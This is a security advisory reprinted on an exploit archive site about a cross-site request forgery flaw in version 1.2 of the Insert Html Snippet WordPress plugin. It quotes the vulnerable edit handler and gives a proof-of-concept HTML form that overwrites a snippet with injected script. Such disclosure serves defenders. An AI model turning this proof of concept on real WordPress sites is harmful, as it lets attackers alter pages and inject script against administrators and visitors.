exploit the possibilities

WordPress Insert Html Snippet 1.2 Cross Site Request Forgery

WordPress Insert Html Snippet 1.2 Cross Site Request Forgery
Posted Nov 29, 2016
Authored by Yorick Koster, Securify B.V.

WordPress Insert Html Snippet plugin version 1.2 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
MD5 | 70597e9717e758afa7044c6df0d23a30

WordPress Insert Html Snippet 1.2 Cross Site Request Forgery

Change Mirror Download
------------------------------------------------------------------------
Cross-Site Request Forgery in Insert Html Snippet WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0027

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that the Insert Html Snippet WordPress Plugin is
vulnerable to Cross-Site Request Forgery. Amongst others, this issue can
be used to update an existing HTML snippet. This can be used to insert
arbitrary HTML and scripting code within a post or page that uses the
snippet. In order to exploit this issue, the attacker has to lure/force
a logged on WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Insert Html Snippet WordPress
Plugin version 1.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been addressed in Insert Html Snippet version 1.2.1.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_insert_html_snippet_wordpress_plugin.html

This issue exists because Insert Html Snippet lacks protection against Cross-Site Request Forgery attacks. See for example the code that is used to edit a snippet.

if(isset($_POST) && isset($_POST['updateSubmit'])){

// echo '<pre>';
// print_r($_POST);
// die("JJJ");
$_POST = stripslashes_deep($_POST);
$_POST = xyz_trim_deep($_POST);

$xyz_ihs_snippetId = $_GET['snippetId'];

$temp_xyz_ihs_title = str_replace(' ', '', $_POST['snippetTitle']);
$temp_xyz_ihs_title = str_replace('-', '', $temp_xyz_ihs_title);

$xyz_ihs_title = str_replace(' ', '-', $_POST['snippetTitle']);
$xyz_ihs_content = $_POST['snippetContent'];

if($xyz_ihs_title != "" && $xyz_ihs_content != ""){

if(ctype_alnum($temp_xyz_ihs_title))
{
$snippet_count = $wpdb->query($wpdb->prepare( 'SELECT * FROM '.$wpdb->prefix.'xyz_ihs_short_code WHERE id!=%d AND title=%s LIMIT 0,1',$xyz_ihs_snippetId,$xyz_ihs_title)) ;

if($snippet_count == 0){
$xyz_shortCode = '[xyz-ihs snippet="'.$xyz_ihs_title.'"]';

$wpdb->update($wpdb->prefix.'xyz_ihs_short_code', array('title'=>$xyz_ihs_title,'content'=>$xyz_ihs_content,'short_code'=>$xyz_shortCode,), array('id'=>$xyz_ihs_snippetId));

In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.

Proof of concept

<html>
<body>
<form action="http://<target>/wp-admin/admin.php?page=insert-html-snippet-manage&action=snippet-edit&snippetId=1&pageno=1" method="POST">
<input type="hidden" name="snippetId" value="1" />
<input type="hidden" name="snippetTitle" value="Fu" />
<input type="hidden" name="snippetContent" value="<script>alert(1);</script>" />
<input type="hidden" name="updateSubmit" value="Update" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    12 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close